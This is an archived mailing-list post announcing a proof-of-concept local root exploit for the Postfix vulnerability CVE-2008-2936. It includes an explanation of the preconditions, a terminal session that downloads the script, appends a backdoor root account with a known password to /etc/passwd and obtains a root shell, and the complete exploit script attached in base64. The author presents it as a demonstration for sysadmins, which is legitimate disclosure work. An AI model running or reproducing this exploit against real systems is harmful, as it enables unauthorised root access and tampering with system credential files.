AOH :: HP Unsorted P :: VA1099.HTM

PoCfix (PoC for Postfix local root vuln - CVE-2008-2936)



PoCfix (PoC for Postfix local root vuln - CVE-2008-2936)
PoCfix (PoC for Postfix local root vuln - CVE-2008-2936)



This is a multi-part message in MIME format.
--------------030608040002040204060508
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

The recent vulnerability in Postfix discovered by Sebastian Krahmer is
trivially exploitable when certain preconditions are met. Nevertheless,
it's very difficult to find such conditions in a real-world scenario. I
wrote this exploit for fun and to demonstrate that. I also hope it helps
sysadmins to check and test their systems.

I used an Ubuntu/Debian (IA32) system which *I had to make vulnerable on
purpose*. The tweaks were:
- - #1: make the spool writable to attacker
chmod o+w /var/mail
- - #2: disable mail aliases (LDA should be able to deliver mail directly to
"root" mailbox)
- - #3: use "local" postfix process as LDA

Perhaps condition #1 is the most difficult to meet, for a normal
(non-privileged) user. But think about a privilege escalation if you manage
to get into the "mail" group first (spool dir is tipically writable by
members of "mail" group).

For #2, it depends on configuration, but Ubuntu/Debian usually creates an
alias for "root", so that mail is delivered to a non-root account (and
making the system non vulnerable to this exploit).

When installing Postfix, you are asked to choose a local delivery agent
(LDA). I found one of my test systems using procmail (not vulnerable) and
another one using postfix built-in LDA (vulnerable).

For a quick test, normally, it will be sufficient to append the following
lines to /etc/postfix/main.cf:
alias_maps mailbox_command (left blank intentionally)

Finally, postfix should be refreshed:
postfix reload

There are other preconditions like:
- - #4: postfix should not be using maildir-style mailboxes
- - #5: mailbox for "root" should not exist (or at least you should have
permission to delete it, which is not always possible, even when #1 is true)

My script tries to do its best to check for these conditions (postfix
config is very flexible, I only checked some typical parameters). Feel free
to write me for corrections, etc.

=============
roman@jupiter:~$ wget http://www.rs-labs.com/exploitsntools/rs_pocfix.sh 
roman@jupiter:~$ chmod a+x rs_pocfix.sh
roman@jupiter:~$ ./rs_pocfix.sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt  
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
[*] Postfix seems to be installed
[*] Hardlink to symlink not dereferenced
[*] Spool dir is writable
[*] Backed up: /etc/passwd (saved as "/tmp/pocfix_target_backup.18107")
[*] Sending mail (3 seconds wait)
[*] Exploit successful (appended data to /etc/passwd). Now "su dsr", pass
is "dsrrocks")
roman@jupiter:~$ su dsr
Password:
sh-3.1#

=============
PS: I didn't find Wietse's nice advisory [1] on postfix.org site (or at
least, if it exists, it's not easy to find it). Although it seems that some
non-POSIX issues in OS are contributing to the vulnerability, IMHO it's a
(low-medium risk) vulnerability in Postfix and it deserves to be listed on
postfix page. Despite this issue, Postfix continues being one of the best
mail server software ever made and my favourite MTA.

[1] http://article.gmane.org/gmane.mail.postfix.announce/110 

- --

Cheers,
- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFIunoI5H+KferVZ0IRAkBrAKCwgHV+6O+At5Hw0dsYs8kYJZQjZACeJ96a
Ww7gCuqOt32rA2HhiTuKeRk=oo87
-----END PGP SIGNATURE-----

--------------030608040002040204060508
Content-Type: application/x-shellscript;
 name="rs_pocfix.sh"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
 filename="rs_pocfix.sh"

IyEvYmluL3NoCiMKIyAicnNfcG9jZml4LnNoIiAoUG9DIGZvciBQb3N0Zml4IGxvY2FsIHJv
b3QgdnVsbmVyYWJpbGl0eTogQ1ZFLTIwMDgtMjkzNikKIyBieSBSb21hbiBNZWRpbmEtSGVp
Z2wgSGVybmFuZGV6IGEuay5hLiBSb01hTlNvRnQgPHJvbWFuQHJzLWxhYnMuY29tPgojCiMg
VGVzdGVkOiBVYnVudHUgLyBEZWJpYW4KIwojIFsgTWFkcmlkLCAzMC5BdWcuMjAwOCBdCiMK
CiMgQ29uZmlnCgp3cml0YWJsZV9kaXI9L3RtcApzcG9vbF9kaXI9L3Zhci9tYWlsCQkjIFVz
ZSAicG9zdGNvbmYgbWFpbF9zcG9vbF9kaXJlY3RvcnkiIHRvIG9idGFpbiB0aGlzCnVzZXI9
cm9vdAp0YXJnZXQ9L2V0Yy9wYXNzd2QKdXNlZnVsX2xpbms9L3Vzci9iaW4vYXRxCSMgbHJ3
eHJ3eHJ3eCAyIHJvb3Qgcm9vdCAyIDIwMDctMDUtMDQgMjI6MTUgL3Vzci9iaW4vYXRxIC0+
IGF0CnVzZWZ1bF9saW5rX2RzdD1hdAkJIyBUaXA6IGZpbmQgLyAtdHlwZSBsIC11aWQgMCAt
cHJpbnQgLWV4ZWMgbHMgLWwge30gXDsgfCBsZXNzCnNlY29uZHM9Mwp1c2VyX2luX3Bhc3N3
ZD0iZHNyOjNHc1hMZEVhS2FHbk06MDowOnJvb3Q6L3Jvb3Q6L2Jpbi9zaCIgICAjIFBhc3Mg
aXMgImRzcnJvY2tzIgpwb3N0Zml4PWB3aGljaCBwb3N0Zml4YAkJIyAvdXNyL3NiaW4vcG9z
dGZpeApwb3N0Y29uZj0vdXNyL3NiaW4vcG9zdGNvbmYKcG9zdG1hcD0vdXNyL3NiaW4vcG9z
dG1hcAoKCiMgRnVuY3MKCnF1aXQoKQp7CiAgZWNobyAiJDEiCiAgZXhpdAp9CgoKIyBTdGVw
IDE6IGlzIG15IHN5c3RlbSB2dWxuZXJhYmxlPwoKaGVhZCAtbiA5ICQwIHwgdGFpbCAtbiA4
CmlmIFsgJHBvc3RmaXggXSA7IHRoZW4KICBlY2hvICJbKl0gUG9zdGZpeCBzZWVtcyB0byBi
ZSBpbnN0YWxsZWQiCmVsc2UKICBxdWl0ICJbIV0gQXJlIHlvdSBzdXJlIFBvc3RmaXggaXMg
aW5zdGFsbGVkPyIKZmkKCm1rZGlyIC1wICR3cml0YWJsZV9kaXIvcG9jZml4CnRvdWNoICR3
cml0YWJsZV9kaXIvcG9jZml4L3NyYwpsbiAtcyAkd3JpdGFibGVfZGlyL3BvY2ZpeC9zcmMg
JHdyaXRhYmxlX2Rpci9wb2NmaXgvZHN0MQpsbiAkd3JpdGFibGVfZGlyL3BvY2ZpeC9kc3Qx
ICR3cml0YWJsZV9kaXIvcG9jZml4L2RzdDIKCmlmIFsgLUwgJHdyaXRhYmxlX2Rpci9wb2Nm
aXgvZHN0MiBdIDsgdGhlbgogIGVjaG8gIlsqXSBIYXJkbGluayB0byBzeW1saW5rIG5vdCBk
ZXJlZmVyZW5jZWQiCiAgcm0gLXJmICR3cml0YWJsZV9kaXIvcG9jZml4CmVsc2UKICBybSAt
cmYgJHdyaXRhYmxlX2Rpci9wb2NmaXgKICBxdWl0ICJbIV0gSGFyZGxpbmsgdG8gc3ltbGlu
ayBjb3JyZWN0bHkgZGVyZWZlcmVuY2VkLiBTeXN0ZW0gaXMgbm90IHZ1bG5lcmFibGUiCmZp
CgppZiBbIC1kICRzcG9vbF9kaXIgLWEgLXcgJHNwb29sX2RpciBdIDsgdGhlbgogIGVjaG8g
IlsqXSBTcG9vbCBkaXIgaXMgd3JpdGFibGUiCmVsc2UKICBxdWl0ICJbIV0gU3Bvb2wgZGly
IGlzIG5vdCB3cml0YWJsZSIKZmkKCmlmIFsgLWUgJHNwb29sX2Rpci8kdXNlciBdIDsgdGhl
bgogIHJtIC1mICRzcG9vbF9kaXIvJHVzZXIKICBlY2hvICJbKl0gTWFpbGJveCBmb3IgXCIk
dXNlclwiIGZvdW5kLiBUcnlpbmcgdG8gZGVsZXRlIGl0IgoKICBpZiBbIC1lICRzcG9vbF9k
aXIvJHVzZXIgXSA7IHRoZW4KICAgIHF1aXQgIlshXSBDb3VsZG4ndCBkZWxldGUgaXQiCiAg
ZWxzZQogICAgZWNobyAiWypdIERlbGV0aW9uIG9rIgogIGZpCgpmaQoKaWYgWyAtZSAkc3Bv
b2xfZGlyLyR1c2VmdWxfbGlua19kc3QgXSA7IHRoZW4KICBybSAtZiAkc3Bvb2xfZGlyLyR1
c2VmdWxfbGlua19kc3QKICBlY2hvICJbKl0gTWFpbGJveCBmb3IgXCIkdXNlZnVsX2xpbmtf
ZHN0XCIgZm91bmQuIFRyeWluZyB0byBkZWxldGUgaXQiCgogIGlmIFsgLWUgJHNwb29sX2Rp
ci8kdXNlZnVsX2xpbmtfZHN0IF0gOyB0aGVuCiAgICBxdWl0ICJbIV0gQ291bGRuJ3QgZGVs
ZXRlIGl0IgogIGVsc2UKICAgIGVjaG8gIlsqXSBEZWxldGlvbiBvayIKICBmaQoKZmkKCmFs
aWFzZXM9YCRwb3N0Y29uZiBhbGlhc19kYXRhYmFzZSB8IGN1dCAtZCI9IiAtZjJgCiRwb3N0
Y29uZiBhbGlhc19tYXBzIHwgZ3JlcCAtcSAkYWxpYXNlcwppZiBbICQ/IC1lcSAwIF0gOyB0
aGVuCiAgaWYgWyAkYWxpYXNlcyBdIDsgdGhlbgogICAgJHBvc3RtYXAgLXEgJHVzZXIgJGFs
aWFzZXMgPiAvZGV2L251bGwKICAgIGlmIFsgJD8gLWVxIDAgXSA7IHRoZW4KICAgICAgcXVp
dCAiWyFdIE1haWwgYWxpYXMgZm9yIFwiJHVzZXJcIiBleGlzdHMiCiAgICBmaQogIGZpCmZp
CgpsZGE9YCRwb3N0Y29uZiBtYWlsYm94X2NvbW1hbmQgfCBjdXQgLWQiPSIgLWYyYAppZiBb
ICRsZGEgXSA7IHRoZW4KICBxdWl0ICJbIV0gTm9uLVBvc3RmaXggTERBIGRldGVjdGVkIgpm
aSAKCiRwb3N0Y29uZiBob21lX21haWxib3ggfCBncmVwIC1xICcvJCcKaWYgWyAkPyAtZXEg
MCBdIDsgdGhlbgogIHF1aXQgIlshXSBNYWlsZGlyLXN0eWxlIG1haWxib3ggZGV0ZWN0ZWQi
CmZpCgoKIyBTdGVwIDI6IEV4cGxvaXRpbmcKCmxuIC1mICR1c2VmdWxfbGluayAkc3Bvb2xf
ZGlyLyR1c2VyIDI+IC9kZXYvbnVsbCB8fCBxdWl0ICJbIV0gQ291bGRuJ3QgY3JlYXRlIGhh
cmRsaW5rIChkaWZmZXJlbnQgcGFydGl0aW9ucz8pIgpsbiAtcyAtZiAkdGFyZ2V0ICRzcG9v
bF9kaXIvJHVzZWZ1bF9saW5rX2RzdCAyPiAvZGV2L251bGwgfHwgcXVpdCAiWyFdIENvdWxk
bid0IGNyZWF0ZSBzeW1saW5rIHBvaW50aW5nIHRvIHRhcmdldCBmaWxlIgpjcCAtZiAkdGFy
Z2V0ICR3cml0YWJsZV9kaXIvcG9jZml4X3RhcmdldF9iYWNrdXAuJCQgJiYgZWNobyAiWypd
IEJhY2tlZCB1cDogJHRhcmdldCAoc2F2ZWQgYXMgXCIkd3JpdGFibGVfZGlyL3BvY2ZpeF90
YXJnZXRfYmFja3VwLiQkXCIpIgplY2hvICJbKl0gU2VuZGluZyBtYWlsICgkc2Vjb25kcyBz
ZWNvbmRzIHdhaXQpIgplY2hvICR1c2VyX2luX3Bhc3N3ZCB8IC91c3Ivc2Jpbi9zZW5kbWFp
bCAkdXNlcgoKc2xlZXAgJHNlY29uZHMKCmRpZmYgLXEgJHRhcmdldCAkd3JpdGFibGVfZGly
L3BvY2ZpeF90YXJnZXRfYmFja3VwLiQkID4gL2Rldi9udWxsCgppZiBbICQ/IC1lcSAwIF0g
OyB0aGVuCiAgZWNobyAiWyFdIEV4cGxvaXQgZmFpbGVkIgplbHNlCiAgZWNobyAiWypdIEV4
cGxvaXQgc3VjY2Vzc2Z1bCAoYXBwZW5kZWQgZGF0YSB0byAkdGFyZ2V0KS4gTm93IFwic3Ug
ZHNyXCIsIHBhc3MgaXMgXCJkc3Jyb2Nrc1wiKSIKZmkKCnJtIC1mICRzcG9vbF9kaXIvJHVz
ZXIKcm0gLWYgJHNwb29sX2Rpci8kdXNlZnVsX2xpbmtfZHN0Cgo--------------030608040002040204060508--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.